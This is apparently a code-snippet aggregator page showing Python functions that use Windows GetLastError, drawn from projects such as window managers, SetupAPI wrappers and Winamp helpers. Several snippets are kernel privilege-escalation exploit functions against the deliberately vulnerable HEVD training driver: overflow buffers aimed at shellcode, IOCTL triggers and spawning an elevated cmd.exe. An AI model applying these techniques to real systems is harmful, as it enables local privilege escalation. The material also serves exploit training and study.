python类GetLastError()的实例源码

funcs_any_win.py 文件源码 项目:petronia 作者: groboclown 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
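def window__activate(hwnd):
    """Bring ``hwnd`` to the foreground and give it keyboard focus.

    This is the "Microsoft Magic Focus Dance": temporarily attach this
    thread's input queue to the thread owning the current foreground window,
    toggle ``hwnd`` through HWND_TOPMOST/HWND_NOTOPMOST, detach again, then
    call SetForegroundWindow/SetFocus/SetActiveWindow.

    :param hwnd: handle of the window to activate
    :return: False if the first SetWindowPos call fails (``hwnd`` is treated
        as not being a valid window); True otherwise.  A failed
        AttachThreadInput is only printed and also returns True without
        touching ``hwnd``, so callers cannot tell that case apart.
    """
    current_hwnd = windll.user32.GetForegroundWindow()
    current_thread_id = windll.kernel32.GetCurrentThreadId()
    thread_process_id = windll.user32.GetWindowThreadProcessId(current_hwnd, None)
    if thread_process_id != current_thread_id:
        res = windll.user32.AttachThreadInput(thread_process_id, current_thread_id, True)
        if res == 0:
            # Read the last-error value exactly once: any further Win32 call
            # would overwrite it, so the code logged must be the code tested.
            err = GetLastError()
            # ERROR_INVALID_PARAMETER means that the two threads are already attached.
            if err != ERROR_INVALID_PARAMETER:
                # TODO better logging
                print("WARN: could not attach thread input to thread {0} ({1})".format(thread_process_id, err))
                return True
    res = windll.user32.SetWindowPos(hwnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE)
    if res == 0:
        return False
    # At this point, the window hwnd is valid, so we don't need to fail out
    # if the results are non-zero.  Some of these will not succeed due to
    # attributes of the window, rather than the window not existing.
    windll.user32.SetWindowPos(hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE)
    # The detach is issued even when no attach happened (same-thread case);
    # its return value is ignored.
    windll.user32.AttachThreadInput(thread_process_id, current_thread_id, False)
    windll.user32.SetForegroundWindow(hwnd)
    windll.user32.SetFocus(hwnd)
    windll.user32.SetActiveWindow(hwnd)
    return True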
setupdi.py 文件源码 项目:pysetupdi 作者: gwangyi 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def open(self):
        """
        Open device to query properties

        Generator-based context manager: creates a SetupAPI device-information
        list, opens this device's instance ID into it and pushes the
        ``(handle, DeviceInfoData, previous)`` triple onto ``self._handle``.
        On exit the entry is popped again (only if it is still on top) and the
        list is destroyed.

        :return: context
        """
        def _raise_last_error():
            # SetupAPI reports failures through the thread's last-error value.
            code = ctypes.GetLastError()
            raise WindowsError(code, ctypes.FormatError(code))

        info_list = _setupapi.SetupDiCreateDeviceInfoList(None, None)
        if info_list == -1:  # INVALID_HANDLE_VALUE, given a signed restype
            _raise_last_error()
        try:
            dev_info = DeviceInfoData()
            instance_id = ctypes.create_unicode_buffer(self._instance_id)
            opened = _setupapi.SetupDiOpenDeviceInfoW(info_list, instance_id, None,
                                                      DIOD_INHERIT_CLASSDRVS, ctypes.byref(dev_info))
            if not opened:
                _raise_last_error()
            # Push onto the handle stack so nested open() calls restore the outer entry.
            self._handle = (info_list, dev_info, self._handle)
            yield self
        finally:
            # Pop only when the top of the stack is the entry this call pushed.
            if self._handle is not None and self._handle[0] == info_list:
                self._handle = self._handle[2]
            _setupapi.SetupDiDestroyDeviceInfoList(info_list)
setupdi.py 文件源码 项目:pysetupdi 作者: gwangyi 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def get_property_keys(self):
        """
        Get all device property keys

        Uses the two-call SetupDiGetDevicePropertyKeys pattern: the first
        call with no buffer reports the required element count, the second
        fills a ``DevicePropertyKey`` array of that size.  If no handle is
        held yet the device is opened for the duration of the call.

        :return: Iterable of device property keys
        """
        if self._handle is None:
            # Not open: open temporarily and recurse once with a handle in place.
            with self.open():
                return self.get_property_keys()

        ERROR_INSUFFICIENT_BUFFER = 122
        info_list, dev_info, _ = self._handle
        needed = ctypes.c_ulong()
        ok = _setupapi.SetupDiGetDevicePropertyKeys(info_list, ctypes.byref(dev_info), None, 0,
                                                    ctypes.byref(needed), 0)
        if ok:
            # Succeeding with a NULL buffer: nothing to return.
            return []

        err_no = ctypes.GetLastError()
        if err_no != ERROR_INSUFFICIENT_BUFFER:
            raise WindowsError(err_no, ctypes.FormatError(err_no))

        # noinspection SpellCheckingInspection
        keys = (DevicePropertyKey * needed.value)()
        ok = _setupapi.SetupDiGetDevicePropertyKeys(info_list, ctypes.byref(dev_info), ctypes.byref(keys),
                                                    needed.value, None, 0)
        if not ok:
            err_no = ctypes.GetLastError()
            raise WindowsError(err_no, ctypes.FormatError(err_no))
        return list(keys)
HEVD_integeroverflow.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def trigger_integer_overflow():
    """Exercise the integer-overflow IOCTL (0x222027) of the HEVD training
    driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code (print statements).  Relies on module-level names not shown
    here: kernel32, ctypes, struct, shell, os, sys, c_ulong,
    create_string_buffer, byref and heap_alloc_payload().
    From the host side the observable events are a user-mode process opening
    this device name and issuing this IOCTL with an oversized length.
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    # [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
    print "[+] Constructing overflow string"
    evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0)
    evil_size  = len(evil_input)
    # CPython-2-specific: derives a raw address from id(); not portable.
    evil_input_ptr = id(evil_input) + 20
    print "[+] Buf size: %d" % evil_size
    einput  = create_string_buffer(evil_input, evil_size)  # unused local
    print "[+] Triggering vuln .."
    # Length argument is 0xFFFFFFFF rather than evil_size; driver_handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
HEVD_nullpointerdereference.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def trigger_nullpointer_dereference():
    """Exercise the null-pointer-dereference IOCTL (0x22202B) of the HEVD
    training driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, struct, shell, os, sys, c_ulong, byref and
    NtAllocateVirtualMemory_shellcode_ptr().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    # Helper defined elsewhere; its result is not used here.
    NtAllocateVirtualMemory_shellcode_ptr()

    magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
    magicvalue_size  = len(magicvalue)
    # CPython-2-specific: derives a raw address from id(); not portable.
    magicvalue_ptr = id(magicvalue) + 20
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)  # result unused

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
HEVD_stackoverflow.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def trigger_stack_overflow():
    """Exercise the stack-overflow IOCTL (0x222003) of the HEVD training
    driver (32-bit variant) and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, struct, shell, os, sys, c_ulong, byref and heap_alloc_payload().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    print "[+] Constructing malicious buffer"
    evil_input = "\x41" * 2080 + struct.pack("<L",heap_alloc_payload())
    evil_size  = len(evil_input)
    # CPython-2-specific: derives a raw address from id(); not portable.
    evil_input_ptr = id(evil_input) + 20
    print "[+] Buf size: %d" % evil_size
    print "[+] Sending malicious buffer"
    print "[+] Triggering vuln .."
    # driver_handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn)   , None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"
HEVD_stackoverflowGS.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def trigger_stack_overflow_GS():
    """Exercise the /GS-protected stack-overflow IOCTL (0x222007) of the HEVD
    training driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, shell, os, sys, c_ulong, byref and create_map_file(), which
    supplies the input buffer and its size.
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    buffer_ptr, buffer_size = create_map_file()

    print "[+] Sending malicious buffer"
    print "[+] Triggering vuln .."
    # Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region
    # before GS check, which BSODs box
    # (i.e. the author expects a crash, not a clean return; driver_handle is never closed.)
    kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn)   , None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"
HEVD_uninitializedheapvariable.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def trigger_uninitialized_heap_variable():
    """Exercise the uninitialized-heap-variable IOCTL (0x00222033) of the
    HEVD training driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, struct, shell, os, sys, c_ulong, byref and tainting_lookaside().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    magicvalue = struct.pack('<I', 0xBAD0B0B1)
    # CPython-2-specific: derives a raw address from id(); not portable.
    magicvalue_ptr = id(magicvalue) + 20
    magicvalue_size  = len(magicvalue)

    # Helper defined elsewhere; runs before the IOCTL is issued.
    tainting_lookaside()
    print "[+] Triggering vuln .."
    # driver_handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
win32_support.py 文件源码 项目:annotated-py-tornado 作者: hhstore 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
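def fcntl(fd, op, arg=0):
    """Minimal Windows stand-in for ``fcntl.fcntl``.

    Only the close-on-exec flag is supported: ``F_GETFD``/``F_GETFL`` always
    report 0, and ``F_SETFD`` with ``FD_CLOEXEC`` marks the handle as
    non-inheritable.

    :param fd: Windows handle (not a CRT file descriptor)
    :param op: one of the ``F_*`` constants defined in this module
    :param arg: flag value for the ``F_SET*`` operations
    :return: 0 for the ``F_GET*`` operations, None otherwise
    :raises OSError: if SetHandleInformation fails; ``ctypes.WinError()``
        carries the Win32 error code and message (a bare ``GetLastError()``
        result is an int and cannot be raised)
    :raises ValueError: for an unsupported ``op``/``arg`` combination
    """
    if op == F_GETFD or op == F_GETFL:
        return 0
    elif op == F_SETFD:
        # Check that the flag is CLOEXEC and translate.
        if arg == FD_CLOEXEC:
            # Close-on-exec means "not inheritable".  The last argument of
            # SetHandleInformation is the NEW value of the masked flag, so it
            # must be 0 here; passing ``arg`` (FD_CLOEXEC, a non-zero value)
            # would set HANDLE_FLAG_INHERIT and leak the handle into child
            # processes — the opposite of what the caller asked for.
            success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
            if not success:
                raise ctypes.WinError()
        else:
            raise ValueError("Unsupported arg")
    # F_SETFL / O_NONBLOCK (an ioctlsocket FIONBIO translation) is
    # intentionally not implemented.
    else:
        raise ValueError("Unsupported op")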
win32_file_watcher.py 文件源码 项目:Deploy_XXNET_Server 作者: jzp820927 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def _monitor(self):
    buff = ctypes.create_string_buffer(_BUFF_SIZE)
    while not self._stop.isSet():
      size_returned = ctypes.c_ulong(0)
      result = ctypes.windll.kernel32.ReadDirectoryChangesW(
          self._directory_handle,
          buff,
          ctypes.c_ulong(_BUFF_SIZE),
          True,  # recursive.
          ctypes.c_ulong(_FILE_NOTIFY_CHANGE_ANY),
          ctypes.byref(size_returned),
          None,
          None)  # this is a blocking call.
      if result == 0 and ctypes.GetLastError() == _ERROR_NOTIFY_ENUM_DIR:
        logging.warning('Buffer overflow while monitoring for file changes.')
        # we need to notify that something changed anyway
        with self._lock:
          self._change_set |= {'Unknown file'}
      if result != 0 and size_returned.value != 0:
        additional_changes = _parse_buffer(buff)
        with self._lock:
          self._change_set |= additional_changes
          self._change_event.set()
winamp.py 文件源码 项目:Packages 作者: Keypirinha 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
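def _send_msg(self, msgId, wparam=0, lparam=0):
        """
        A util method to send a simple message to a window. Lazy init is
        supported.

        SendMessageW's return value alone cannot signal failure, so the
        thread's last-error value is cleared before the call and read back
        afterwards.  If the window handle turned out to be stale,
        ``_find_winamp`` gets one chance to locate the window again and the
        message is re-sent once.

        :return: the SendMessageW result, or None if the call raised, failed,
            or the window could not be re-located
        """
        for _attempt in range(2):
            try:
                ctypes.windll.kernel32.SetLastError(0)
                result = ctypes.windll.user32.SendMessageW(
                    self.wa_hwnd, msgId, wparam, lparam)
                winerr = ctypes.GetLastError()
            except Exception:
                return None

            if winerr == 0:
                return result
            if winerr != WinampRemote._WINERR_INVALID_WINDOW_HANDLE:
                return None
            # We've lost Winamp: try to find it a last time, then retry.
            try:
                if self._find_winamp():
                    continue
            except Exception:
                # Narrowed from a bare ``except``, which would also swallow
                # KeyboardInterrupt and SystemExit.
                pass
            return None
        # Both attempts hit a stale window handle.
        return None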
winamp.py 文件源码 项目:Packages 作者: Keypirinha 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
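def _read_remote_string(self, address, as_unicode=True):
        """Reads a string from Winamp's memory address space.

        :param address: address in the Winamp process to read from
        :param as_unicode: read into a wide-character buffer (``True``) or a
            byte buffer (``False``)
        :return: the NUL-terminated string found at ``address``, or None when
            no Winamp process handle is held or ReadProcessMemory fails
        """
        if not self.wa_hproc:
            # No process handle: nothing to read from.
            return None

        buflen = 1024
        if as_unicode:
            buffer = ctypes.create_unicode_buffer(buflen)
        else:
            buffer = ctypes.create_string_buffer(buflen)
        bytes_read = ctypes.c_size_t(0)

        # NOTE(review): ``buflen`` is passed as a byte count, so the wide
        # buffer (buflen characters) is only half filled — confirm intended.
        if not ctypes.windll.kernel32.ReadProcessMemory(
                self.wa_hproc, address, buffer, buflen, ctypes.byref(bytes_read)):
            # Failure is reported as None; ctypes.FormatError(ctypes.GetLastError())
            # gives the reason when debugging.
            return None

        return buffer.value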
alttab.py 文件源码 项目:Packages 作者: Keypirinha 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def get_process_image_path(proc_id):
        """
        Return the full path of the PE image of the given process ID.
        Raises a OSError exception on error.

        The process is opened with PROCESS_QUERY_INFORMATION only, queried
        with QueryFullProcessImageNameW and closed again before the result is
        examined; the last-error value is saved across CloseHandle so the
        OSError describes the query, not the close.
        """
        PROCESS_QUERY_INFORMATION = 0x400
        kernel32 = ctypes.windll.kernel32

        hproc = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, proc_id)
        if not hproc:
            raise ctypes.WinError()

        # MAX_PATH is 260 but we're using the Unicode variant of the API,
        # so over-allocate.
        capacity = 1024
        path_len = ctypes.c_ulong(capacity)
        path_buf = ctypes.create_unicode_buffer(capacity)
        kernel32.SetLastError(0)
        ok = kernel32.QueryFullProcessImageNameW(hproc, 0, path_buf, ctypes.byref(path_len))
        saved_error = ctypes.GetLastError()
        kernel32.CloseHandle(hproc)
        kernel32.SetLastError(saved_error)  # so WinError() reports the query's code
        if not ok:
            raise ctypes.WinError()
        return path_buf.value
windows.py 文件源码 项目:noc-orchestrator 作者: DirceuSilvaLabs 项目源码 文件源码 阅读 46 收藏 0 点赞 0 评论 0
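def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()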
windows.py 文件源码 项目:noc-orchestrator 作者: DirceuSilvaLabs 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
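def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()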
windows.py 文件源码 项目:noc-orchestrator 作者: DirceuSilvaLabs 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
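def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()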
funcs_any_win.py 文件源码 项目:petronia 作者: groboclown 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
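def _attach_message_queue_to_thread(current_hwnd):
    """Attach this thread's input queue to the thread owning ``current_hwnd``,
    then detach it again.

    :param current_hwnd: window whose owning thread is attached to
    :return: True if AttachThreadInput failed for a reason other than the
        threads already being attached (the failure is printed, not raised);
        False otherwise.
    """
    current_thread_id = windll.kernel32.GetCurrentThreadId()
    thread_process_id = windll.user32.GetWindowThreadProcessId(current_hwnd, None)
    if thread_process_id != current_thread_id:
        res = windll.user32.AttachThreadInput(thread_process_id, current_thread_id, True)
        if res == 0:
            # Read the last-error value once; a further Win32 call would overwrite it.
            err = GetLastError()
            # ERROR_INVALID_PARAMETER means that the two threads are already attached.
            if err != ERROR_INVALID_PARAMETER:
                # TODO better logging
                print("WARN: could not attach thread input to thread {0} ({1})".format(thread_process_id, err))
                return True
    # The detach is issued even when no attach happened (same-thread case);
    # its return value is ignored.
    windll.user32.AttachThreadInput(thread_process_id, current_thread_id, False)
    return False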
windows.py 文件源码 项目:zanph 作者: zanph 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
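def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()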
pipe_non_blocking.py 文件源码 项目:bpy_lambda 作者: bcongdon 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def pipe_non_blocking_is_error_blocking(ex):
        """Return True if ``ex`` represents a "no data yet" condition on a
        non-blocking pipe.

        Only a ``PortableBlockingIOError`` qualifies; for one, the Win32
        last-error value is compared against ERROR_NO_DATA (232).
        """
        ERROR_NO_DATA = 232
        if isinstance(ex, PortableBlockingIOError):
            from ctypes import GetLastError
            return GetLastError() == ERROR_NO_DATA
        return False
structures.py 文件源码 项目:pysetupdi 作者: gwangyi 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def __init__(self, guid="{00000000-0000-0000-0000-000000000000}"):
        """Initialise the GUID structure from a string or from raw bytes.

        :param guid: either a ``{xxxxxxxx-...}`` string parsed by
            CLSIDFromString, or a bytes-like object whose first
            ``sizeof(self)`` bytes are copied verbatim into the structure
        """
        super().__init__()
        if not isinstance(guid, str):
            # Raw form: copy the bytes straight over the structure's storage.
            ctypes.memmove(ctypes.byref(self), bytes(guid), ctypes.sizeof(self))
            return
        ret = _ole32.CLSIDFromString(ctypes.create_unicode_buffer(guid), ctypes.byref(self))
        if ret < 0:
            # NOTE(review): CLSIDFromString returns an HRESULT in ``ret``;
            # GetLastError() is not guaranteed to describe this failure.
            err_no = ctypes.GetLastError()
            raise WindowsError(err_no, ctypes.FormatError(err_no), guid)
structures.py 文件源码 项目:pysetupdi 作者: gwangyi 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
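def __str__(self):
        """Return the ``{xxxxxxxx-...}`` string form of this GUID.

        StringFromCLSID hands back a COM-allocated buffer, which is released
        with CoTaskMemFree once its contents are copied into a Python ``str``.

        :raises WindowsError: if StringFromCLSID fails
        """
        s = ctypes.c_wchar_p()
        ret = _ole32.StringFromCLSID(ctypes.byref(self), ctypes.byref(s))
        if ret < 0:
            # NOTE(review): ``ret`` is an HRESULT; GetLastError() may not
            # describe this particular failure.
            err_no = ctypes.GetLastError()
            raise WindowsError(err_no, ctypes.FormatError(err_no))
        try:
            return str(s.value)
        finally:
            # Free the COM buffer even if the conversion above raises.
            _ole32.CoTaskMemFree(s)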
windows.py 文件源码 项目:trex-http-proxy 作者: alwye 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
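def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()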
windows.py 文件源码 项目:trex-http-proxy 作者: alwye 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
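def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()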
windows.py 文件源码 项目:trex-http-proxy 作者: alwye 项目源码 文件源码 阅读 43 收藏 0 点赞 0 评论 0
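def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()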
windows.py 文件源码 项目:trex-http-proxy 作者: alwye 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
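def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()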
windows.py 文件源码 项目:trex-http-proxy 作者: alwye 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
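def set_close_exec(fd):
    """Mark the Windows handle ``fd`` as non-inheritable (close-on-exec).

    Clears HANDLE_FLAG_INHERIT so the handle is not passed to child processes.

    :param fd: Windows handle
    :raises OSError: if SetHandleInformation fails.  ``ctypes.WinError()``
        wraps the Win32 last-error code; a bare ``GetLastError()`` result is
        an int and cannot be raised.
    """
    success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
    if not success:
        raise ctypes.WinError()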
HEVD_arbitraryoverwrite.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def trigger_arbitrary_overwrite():
    """Exercise the arbitrary-overwrite IOCTL (0x22200B) of the HEVD training
    driver, then call NtQueryIntervalProfile and spawn cmd.exe if the process
    ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ntdll, ctypes, struct, shell, os, sys, c_ulong, c_void_p, addressof,
    byref, heap_alloc_payload() and get_HDT_kernel_address().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    #  [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
    write_what = heap_alloc_payload()
    write_where = get_HDT_kernel_address() + 4

    # write_what_ptr must stay alive until the IOCTL returns: its address is what gets packed.
    write_what_ptr = c_void_p(write_what)   
    evil_input = struct.pack("<L", addressof(write_what_ptr)) +  struct.pack("<L", write_where)
    # CPython-2-specific: derives a raw address from id(); not portable.
    evil_input_ptr = id(evil_input) + 20
    evil_size  = len(evil_input)
    print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where)
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)

    print "[+] Calling NtQueryIntervalProfile to trigger vuln"
    arb = c_ulong(0)
    ntdll.NtQueryIntervalProfile(0x1337, byref(arb))

    # driver_handle is never closed.
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
HEVD_ununitializedstackvariable.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def trigger_uninitialized_stack_variable():
    """Exercise the uninitialized-stack-variable IOCTL (0x22202F) of the HEVD
    training driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ntdll, ctypes, struct, shell, os, sys, c_ulong, create_string_buffer,
    byref and heap_alloc_payload().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()


    magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
    # CPython-2-specific: derives a raw address from id(); not portable.
    magicvalue_ptr = id(magicvalue) + 20
    magicvalue_size  = len(magicvalue)
    print "[+] Buf size: %d" % magicvalue_size
    einput  = create_string_buffer(magicvalue, magicvalue_size)  # unused local

    # stack spray
    shellcode_ptr = heap_alloc_payload()
    print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
    print "[+] Triggering vuln .."

    # The packed buffer below is a temporary; it is only valid for this call.
    ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
    # driver_handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
